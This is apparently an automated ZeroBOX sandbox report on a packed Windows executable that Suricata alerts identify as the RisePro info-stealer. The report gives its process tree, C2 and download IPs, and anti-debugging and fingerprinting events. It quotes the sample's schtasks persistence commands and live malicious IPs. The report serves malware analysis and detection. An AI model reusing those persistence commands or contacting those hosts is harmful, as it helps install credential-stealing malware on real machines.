Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Feb. 13, 2024, 12:17 p.m.	Feb. 13, 2024, 12:21 p.m.

Size	2.3MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`e9a17be752fa6e93d9e2f76adb0fa896`
SHA256	`27df83ea67c2eceb9c48c21a07685866416b802afd67163ac53012652c5366d2`
CRC32	`204D94F5`
ssdeep	`49152:CRKQ8JhqHYu5TuZLy6TmyEJe+sPYfqxSaZocCXLCa59vYrPx:CR/8JcHYEuZLyslLA+a59QrPx`
Yara	IsPE32 - (no description) PE_Header_Zero - PE File Signature UPX_Zero - UPX packed file

zara.exe "C:\Users\test22\AppData\Local\Temp\zara.exe"
2544
- schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
  2764
- schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
  2848
- 27Jq3pCQAGfjWkgZSAJ0.exe "C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP\27Jq3pCQAGfjWkgZSAJ0.exe"
  3028
  - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
    1216
    - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:1216 CREDAT:145409
      2104
  - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://www.youtube.com
    2876
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3eef1e8,0x7fef3eef1f8,0x7fef3eef208
      2140
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2904 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
      3344
  - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://www.facebook.com/video
    2128
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3eef1e8,0x7fef3eef1f8,0x7fef3eef208
      3144
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2144 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
      3540
  - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://accounts.google.com
    2832
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3eef1e8,0x7fef3eef1f8,0x7fef3eef208
      3412
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2132 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
      3680
  - firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
    3248
    - firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
      3572
      - crashreporter.exe "C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Local\Temp\\66ba93ae-8a2e-46a0-ac05-4d8dabe04d62.dmp"
        4064
        
        minidump-analyzer.exe "C:\Program Files\Mozilla Firefox\minidump-analyzer.exe" "C:\Users\test22\AppData\Local\Temp\\66ba93ae-8a2e-46a0-ac05-4d8dabe04d62.dmp"
        3252
  - firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video
    3452
    - firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video
      3784
  - firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
    3716
    - firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
      3932
      - crashreporter.exe "C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\qxo5wa6x.default-release\minidumps\539f6f4a-a0c7-4ede-b970-099eaf599984.dmp"
        3120
        
        minidump-analyzer.exe "C:\Program Files\Mozilla Firefox\minidump-analyzer.exe" "C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\qxo5wa6x.default-release\minidumps\539f6f4a-a0c7-4ede-b970-099eaf599984.dmp"
        4192
- schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST
  2596
- schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST
  2820
- H86W_nRG_QiDnpacl1Q7.exe "C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP\H86W_nRG_QiDnpacl1Q7.exe"
  504
- 48GAGLpHe8SfQaAeuUjD.exe "C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP\48GAGLpHe8SfQaAeuUjD.exe"
  2296
- Ji6eSDaqEh9J_LBdm7Gg.exe "C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP\Ji6eSDaqEh9J_LBdm7Gg.exe"
  1320
- bBd0YznJ45TDQR7kIkRA.exe "C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP\bBd0YznJ45TDQR7kIkRA.exe"
  2744
- zdsQt76OWN37K50HOTgL.exe "C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP\zdsQt76OWN37K50HOTgL.exe"
  1512
  - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://accounts.google.com
    1864
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3eef1e8,0x7fef3eef1f8,0x7fef3eef208
      2436
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=1976 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
      2776
explorer.exe C:\Windows\Explorer.EXE
1452

Name	Response	Post-Analysis Lookup
accounts.google.com	A 74.125.23.84	74.125.203.84
ipinfo.io	A 34.117.186.192	34.117.186.192
www.google.com	A 172.217.25.4	142.250.206.196
ssl.gstatic.com	A 172.217.31.3	172.217.161.195
db-ip.com	A 104.26.5.15 A 104.26.4.15 A 172.67.75.166	104.26.4.15
www.maxmind.com	A 104.18.145.235 A 104.18.146.235	104.18.145.235

IP Address	Status	Action
104.18.145.235	Active	Moloch
104.26.5.15	Active	Moloch
117.18.232.200	Active	Moloch
164.124.101.2	Active	Moloch
172.217.25.4	Active	Moloch
172.217.31.3	Active	Moloch
185.215.113.46	Active	Moloch
193.233.132.62	Active	Moloch
34.117.186.192	Active	Moloch
74.125.23.84	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49165 -> 193.233.132.62:50500	2049060	ET MALWARE RisePro TCP Heartbeat Packet	A Network Trojan was detected
TCP 193.233.132.62:50500 -> 192.168.56.101:49165	2046266	ET MALWARE [ANY.RUN] RisePro TCP (Token)	A Network Trojan was detected
TCP 192.168.56.101:49165 -> 193.233.132.62:50500	2046270	ET MALWARE [ANY.RUN] RisePro TCP (Exfiltration)	A Network Trojan was detected
TCP 192.168.56.101:49165 -> 193.233.132.62:50500	2049661	ET MALWARE RisePro CnC Activity (Inbound)	A Network Trojan was detected
TCP 192.168.56.101:49165 -> 193.233.132.62:50500	2046269	ET MALWARE [ANY.RUN] RisePro TCP (Activity)	A Network Trojan was detected
TCP 185.215.113.46:80 -> 192.168.56.101:49177	2400021	ET DROP Spamhaus DROP Listed Traffic Inbound group 22	Misc Attack
TCP 192.168.56.101:49166 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49166 -> 34.117.186.192:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49166 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49166 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49168 -> 104.26.5.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49183 -> 74.125.23.84:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49182 -> 74.125.23.84:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49177 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49177 -> 185.215.113.46:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.101:49177 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49177 -> 185.215.113.46:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.101:49185 -> 172.217.31.3:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 185.215.113.46:80 -> 192.168.56.101:49177	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.46:80 -> 192.168.56.101:49177	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49186 -> 172.217.31.3:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49192 -> 172.217.25.4:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49193 -> 172.217.25.4:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49177 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49177 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.215.113.46:80 -> 192.168.56.101:49177	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49177 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 193.233.132.62:50500 -> 192.168.56.101:49205	2046266	ET MALWARE [ANY.RUN] RisePro TCP (Token)	A Network Trojan was detected
TCP 193.233.132.62:50500 -> 192.168.56.101:49206	2046266	ET MALWARE [ANY.RUN] RisePro TCP (Token)	A Network Trojan was detected
TCP 192.168.56.101:49177 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49212 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49212 -> 34.117.186.192:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49205 -> 193.233.132.62:50500	2049060	ET MALWARE RisePro TCP Heartbeat Packet	A Network Trojan was detected
TCP 192.168.56.101:49212 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49165 -> 193.233.132.62:50500	2049661	ET MALWARE RisePro CnC Activity (Inbound)	A Network Trojan was detected
TCP 192.168.56.101:49211 -> 104.26.5.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49214 -> 104.26.5.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49177 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.215.113.46:80 -> 192.168.56.101:49177	2014819	ET INFO Packed Executable Download	Misc activity
TCP 192.168.56.101:49177 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49177 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49177 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49177 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49177 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49209 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49209 -> 34.117.186.192:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49209 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49209 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49212 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49166 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49209 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49168 104.26.5.15:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1 192.168.56.101:49183 74.125.23.84:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=accounts.google.com	ab:83:36:d4:0e:8a:7a:70:e2:25:37:9f:9b:e7:d1:f8:48:1f:68:07
TLSv1 192.168.56.101:49182 74.125.23.84:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=accounts.google.com	ab:83:36:d4:0e:8a:7a:70:e2:25:37:9f:9b:e7:d1:f8:48:1f:68:07
TLSv1 192.168.56.101:49185 172.217.31.3:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	9d:25:7e:5c:df:c3:e5:5b:00:4f:04:97:a3:48:a3:30:60:9a:db:48
TLSv1 192.168.56.101:49186 172.217.31.3:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	9d:25:7e:5c:df:c3:e5:5b:00:4f:04:97:a3:48:a3:30:60:9a:db:48
TLSv1 192.168.56.101:49192 172.217.25.4:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=www.google.com	5d:23:4f:47:50:a1:0c:c2:bd:e0:26:27:45:ea:e2:c7:f5:34:61:5b
TLSv1 192.168.56.101:49193 172.217.25.4:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=www.google.com	5d:23:4f:47:50:a1:0c:c2:bd:e0:26:27:45:ea:e2:c7:f5:34:61:5b
TLSv1 192.168.56.101:49211 104.26.5.15:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1 192.168.56.101:49214 104.26.5.15:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5

Queries for the computername (8 events)

Time & API	Arguments	Status	Return
GetComputerNameA Feb. 13, 2024, 12:17 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 13, 2024, 12:17 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 13, 2024, 12:17 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 13, 2024, 12:17 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 13, 2024, 12:17 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 13, 2024, 12:17 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 13, 2024, 12:17 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Feb. 13, 2024, 12:18 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (50 out of 174 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Feb. 13, 2024, 12:17 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:17 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:17 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:17 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:17 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:17 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:17 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:17 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:17 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:17 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:17 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:17 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:18 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:18 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:18 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:18 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:18 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:18 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:18 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:18 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:18 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:17 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:18 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:18 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:18 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:18 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:18 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:18 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:18 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:18 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:18 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:18 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:18 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:18 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:18 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:18 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:18 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:18 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:18 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:18 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:18 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:18 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:18 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:18 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:18 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:18 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:18 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:18 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:18 p.m.			0	0
IsDebuggerPresent Feb. 13, 2024, 12:18 p.m.			0	0

Command line console output was observed (4 events)

Time & API	Arguments	Status	Return
WriteConsoleW Feb. 13, 2024, 12:17 p.m.	buffer: SUCCESS: The scheduled task "MPGPH131 HR" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Feb. 13, 2024, 12:17 p.m.	buffer: SUCCESS: The scheduled task "MPGPH131 LG" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Feb. 13, 2024, 12:17 p.m.	buffer: SUCCESS: The scheduled task "MSIUpdaterV131 HR" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Feb. 13, 2024, 12:17 p.m.	buffer: SUCCESS: The scheduled task "MSIUpdaterV131 LG" has successfully been created. console_handle: 0x00000007	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Tries to locate where the browsers are installed (5 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file	C:\Program Files\Mozilla Firefox\api-ms-win-core-file-l2-1-0.dll
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe\PATH
registry	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Feb. 13, 2024, 12:17 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (6 events)

section	\x00
section	.idata
section
section	brmsztpq
section	blexknig
section	.taggant

One or more processes crashed (50 out of 511 events)

Time & API	Arguments	Status
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: fb e9 4e 01 00 00 60 8b 74 24 24 8b 7c 24 28 fc exception.symbol: zara+0x3fc0b9 exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 4178105 exception.address: 0x4fc0b9 registers.esp: 9895192 registers.edi: 0 registers.eax: 1 registers.ebp: 9895208 registers.edx: 6987776 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb 55 89 04 24 56 68 3b 12 be 67 5e 89 f0 ff 34 exception.symbol: zara+0x14c052 exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 1359954 exception.address: 0x24c052 registers.esp: 9895156 registers.edi: 1968898280 registers.eax: 30065 registers.ebp: 3992428564 registers.edx: 2407865 registers.ebx: 2370522 registers.esi: 3 registers.ecx: 1969094656	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb 57 57 89 1c 24 c7 04 24 eb 23 63 6f f7 14 24 exception.symbol: zara+0x14bffc exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 1359868 exception.address: 0x24bffc registers.esp: 9895160 registers.edi: 1968898280 registers.eax: 30065 registers.ebp: 3992428564 registers.edx: 2437930 registers.ebx: 2370522 registers.esi: 3 registers.ecx: 1969094656	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 89 14 24 c7 04 24 77 22 ed exception.symbol: zara+0x14c1c2 exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 1360322 exception.address: 0x24c1c2 registers.esp: 9895160 registers.edi: 1968898280 registers.eax: 30065 registers.ebp: 3992428564 registers.edx: 2410814 registers.ebx: 237801 registers.esi: 3 registers.ecx: 0	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb 56 83 ec 04 89 0c 24 b9 a6 e7 6a 6f 89 ce 59 exception.symbol: zara+0x14d78e exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 1365902 exception.address: 0x24d78e registers.esp: 9895156 registers.edi: 1968898280 registers.eax: 26246 registers.ebp: 3992428564 registers.edx: 2412066 registers.ebx: 240065354 registers.esi: 3 registers.ecx: 0	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb e9 5b fa ff ff 8f 02 e9 5e fb ff ff 31 c7 e9 exception.symbol: zara+0x14d4c2 exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 1365186 exception.address: 0x24d4c2 registers.esp: 9895160 registers.edi: 1259 registers.eax: 0 registers.ebp: 3992428564 registers.edx: 2415024 registers.ebx: 240065354 registers.esi: 3 registers.ecx: 0	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb 56 be 2d 0f fb 7f 01 f3 ff 34 24 8b 34 24 81 exception.symbol: zara+0x2bed41 exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 2878785 exception.address: 0x3bed41 registers.esp: 9895156 registers.edi: 2447293 registers.eax: 30858 registers.ebp: 3992428564 registers.edx: 2130566132 registers.ebx: 3925680 registers.esi: 3909763 registers.ecx: 781	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb 52 89 0c 24 e9 69 02 00 00 96 f7 d6 e9 24 00 exception.symbol: zara+0x2bec46 exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 2878534 exception.address: 0x3bec46 registers.esp: 9895160 registers.edi: 409577 registers.eax: 30858 registers.ebp: 3992428564 registers.edx: 2130566132 registers.ebx: 3928634 registers.esi: 3909763 registers.ecx: 0	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb e9 00 00 00 00 83 ec 04 89 34 24 89 04 24 89 exception.symbol: zara+0x2c190b exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 2889995 exception.address: 0x3c190b registers.esp: 9895160 registers.edi: 1761541656 registers.eax: 29940 registers.ebp: 3992428564 registers.edx: 12255604 registers.ebx: 3965962 registers.esi: 0 registers.ecx: 0	1
